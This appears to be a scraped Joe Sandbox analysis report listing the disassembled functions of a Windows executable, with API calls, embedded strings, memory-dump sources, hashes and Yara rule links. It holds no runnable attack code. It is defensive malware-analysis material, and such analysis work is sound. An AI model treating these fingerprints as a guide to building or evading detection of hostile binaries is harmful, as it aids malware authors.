Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction ID: 3c8436d7ebe78b1b785c38bf73c225cfb257a28959a0d5a818fe8d94fd8ca8ae
Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction Fuzzy Hash: B6411233A28B8291DA20DF64E4552AEB360FB943A4F501B35E6AD877D5EF7CE0448B40

Function 00007FF67D001050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF67D0010F8, 00007FF67D001126
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF67D0010B4
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF67D0010F1
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF67D001249
1.3.1, xrefs: 00007FF67D00107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF67D00111F

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: e318067b392980eface6509008cb7fe0607782201bbc93a051e4a56893f6ca8a
Instruction ID: 15508fc23feca2af24f58c1d45d7ea67adb27603b2d5d7dea89296977e0368b1
Opcode Fuzzy Hash: e318067b392980eface6509008cb7fe0607782201bbc93a051e4a56893f6ca8a
Instruction Fuzzy Hash: B551DD23A3968295EA20EF51A4403BA6690FB847D8F486A35EE4DC7789FE3CF554C700

Function 00007FF67D01F2D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF67D01F66A,?,?,-00000018,00007FF67D01B417,?,?,?,00007FF67D01B30E,?,?,?,00007FF67D016552), ref: 00007FF67D01F44C
GetProcAddress.KERNEL32(?,?,?,00007FF67D01F66A,?,?,-00000018,00007FF67D01B417,?,?,?,00007FF67D01B30E,?,?,?,00007FF67D016552), ref: 00007FF67D01F458

Strings

api-ms-, xrefs: 00007FF67D01F396
ext-ms-, xrefs: 00007FF67D01F3A9

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction ID: 234013446e49255154d8bb0e44ed513ec0f659121e4ed6c2d25cb8b9317b11bd
Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction Fuzzy Hash: B941F523B3961246FA15CF16A8406BD2691BF49BA4F486B35DE0DD7784FE3DF4458300

Function 00007FF67D01C11C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01C549

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction ID: f3faf9103a087a065fdc0e2a6af1d8c512a046a9a92bffb2f16de09fa2f0533a
Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction Fuzzy Hash: FDC1F32392C78282E7609F5590442BDBB64FF81B88F552B31DA4E87391EE7EF845C704

Function 00007FF67D008660 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67D008680
OpenProcessToken.ADVAPI32 ref: 00007FF67D008691
GetTokenInformation.KERNELBASE ref: 00007FF67D0086B6
GetLastError.KERNEL32 ref: 00007FF67D0086C0
GetTokenInformation.KERNELBASE ref: 00007FF67D008700
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67D00871C
CloseHandle.KERNEL32 ref: 00007FF67D008734

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction ID: 03b509b9e417798de557d71de7c50e6bd46a4f8f365bf5b2b7c883405290775a
Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction Fuzzy Hash: 2621413262864292EA109F55E48412EB7A0FF857E4F501B35DAAC83AE8EF6CF4448700

Function 00007FF67D008980 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67D008660: GetCurrentProcess.KERNEL32 ref: 00007FF67D008680
Part of subcall function 00007FF67D008660: OpenProcessToken.ADVAPI32 ref: 00007FF67D008691
Part of subcall function 00007FF67D008660: GetTokenInformation.KERNELBASE ref: 00007FF67D0086B6
Part of subcall function 00007FF67D008660: GetLastError.KERNEL32 ref: 00007FF67D0086C0
Part of subcall function 00007FF67D008660: GetTokenInformation.KERNELBASE ref: 00007FF67D008700
Part of subcall function 00007FF67D008660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67D00871C
Part of subcall function 00007FF67D008660: CloseHandle.KERNEL32 ref: 00007FF67D008734

LocalFree.KERNEL32(00000000,00007FF67D003B6E), ref: 00007FF67D008A0C
LocalFree.KERNEL32 ref: 00007FF67D008A15

Strings

D:(A;;FA;;;%s), xrefs: 00007FF67D0089F7
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF67D0089E2
S-1-3-4, xrefs: 00007FF67D0089C1
Security descriptor string length exceeds PATH_MAX!, xrefs: 00007FF67D008A23

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
API String ID: 6828938-1817031585
Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
Instruction ID: bd5a2366e6ab029fc1deeb5e772c3f27ee38ad768d02a67b8a4db86158fb0840
Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
Instruction Fuzzy Hash: 3C216023A39A4691FA10EF20E4456F96355FF587D0F842B36E94DC3696FE3CF5448250

Function 00007FF67D01D620 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67D01D60B), ref: 00007FF67D01D73C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67D01D60B), ref: 00007FF67D01D7C7

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction ID: 7b5a874170c82ec1d310c14cf85f9f6998925fdb0e6e429a07f38c116df5b9e8
Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction Fuzzy Hash: 2091B223E2865285F7609F6594402BD2BA0FB54B8CF186B39DE0EA7684EF39F442C310

Function 00007FF67D01FDEC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF67D01FEDC
_get_daylight.LIBCMT ref: 00007FF67D01FEED
_get_daylight.LIBCMT ref: 00007FF67D01FEFE
_isindst.LIBCMT ref: 00007FF67D01FFC9

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction ID: 80e2facaa18845832926c4e00c9cf8b956f6016d9bfdefbd820f2008ebc96e1e
Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction Fuzzy Hash: AD51C273F242118AEB18CF6599556BC2BA5BF0136CF502739DE1E92AE5EF39B401C700

Function 00007FF67D00C17C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF67D00C18B

Part of subcall function 00007FF67D00C34C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF67D00C36E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF67D00C1A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF67D00C20E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF67D00C261

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction ID: 19a29705b31335b599ce6929db759c519194dbfe6f5c4a231ec95602e13dfba8
Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction Fuzzy Hash: 8B315923E3D14261FA24AFA4A4513B92381AF55788F487E35E94EC76D7FE2CB8048219

Function 00007FF67D015800 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01582D
CreateFileW.KERNELBASE ref: 00007FF67D01586C
CloseHandle.KERNEL32 ref: 00007FF67D0158A1

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction ID: 9c0b2f8d38f0d2b8648b5248ae6ad30baef9af6b54be4608d027d36714965c6d
Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction Fuzzy Hash: 9641B123D2878283E7508F6495183AD6370FF94768F10A735EA9C8BAD5EF6DF1A08700

Function 00007FF67D01A0C0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF67D01A0BC), ref: 00007FF67D01A0D1
TerminateProcess.KERNEL32(?,?,?,00007FF67D01A0BC), ref: 00007FF67D01A0DC
ExitProcess.KERNEL32 ref: 00007FF67D01A0EB

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction ID: 222c55ffabafbae71a1cfae65c0f10c034e279faa243d29fb37735f99547adee
Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction Fuzzy Hash: DCD01C12B2920B42EA28AF31198A03C02116F8C708F403E38C80A93387ED3EB81A8200

Function 00007FF67D008B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE ref: 00007FF67D008BC0

Part of subcall function 00007FF67D002C50: MessageBoxW.USER32 ref: 00007FF67D002D25

Strings

Security descriptor is not initialized!, xrefs: 00007FF67D008B90

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CreateDirectoryMessage
String ID: Security descriptor is not initialized!
API String ID: 73271072-986317556
Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction ID: a556efd0a4860ba7fc9fba48105996e25005b9c006741db663a94ef5e74a09fa
Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction Fuzzy Hash: 4BE092B2A28B0686EA209F24E8446692290FB55354F842734E55CC73E4FF3CF1098B40

Function 00007FF67D01037C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0103C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0104B7

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: 6634a36233fcc233317838abb9d722e3b5d378a84b7d7db16af1774061861a0e
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: 3F510763B2925186FB24DE26950067E7685BF44BACF246F34DDAC977C5EE3EF4018600

Function 00007FF67D01B21C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF67D01B099,?,?,00000000,00007FF67D01B14E), ref: 00007FF67D01B28A
GetLastError.KERNEL32(?,?,?,00007FF67D01B099,?,?,00000000,00007FF67D01B14E), ref: 00007FF67D01B294

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction ID: 332dfe09540aa1c69e7ef407ed5fc24eae633637c025cc03c27771bd9b8e187e
Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction Fuzzy Hash: DD21F623B3868201FAA09F61949427D2A826F867A8F446B34DA2DC73D5FF6DF4489301

Function 00007FF67D01C7F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF67D01C98D), ref: 00007FF67D01C840
GetLastError.KERNEL32(?,?,?,?,?,00007FF67D01C98D), ref: 00007FF67D01C84A

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction ID: 9b0bd2a49ef5da6de593e2b174880ded3885a4319576ef62e18cfb771e40af84
Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction Fuzzy Hash: C111EF22A28B8181EA108F25A44406DA361FB44BF8F542731EE7D8B7E9EF7CF0408744

Function 00007FF67D0181BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67D018039), ref: 00007FF67D0181DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67D018039), ref: 00007FF67D0181F5

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction ID: 13db99ab5a45af39ce369dce5e6782ab82796275804644c76f29c5b53e178b9c
Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction Fuzzy Hash: 11017C2392C65282E7508F14A40123EB7B0FB857A5F602736EAAD815D8EF3DE144CB00

Function 00007FF67D01B00C Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction ID: 0efc3323b7cbe67cc60c195e51014721da58329019b177de91177c9f771cb076
Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
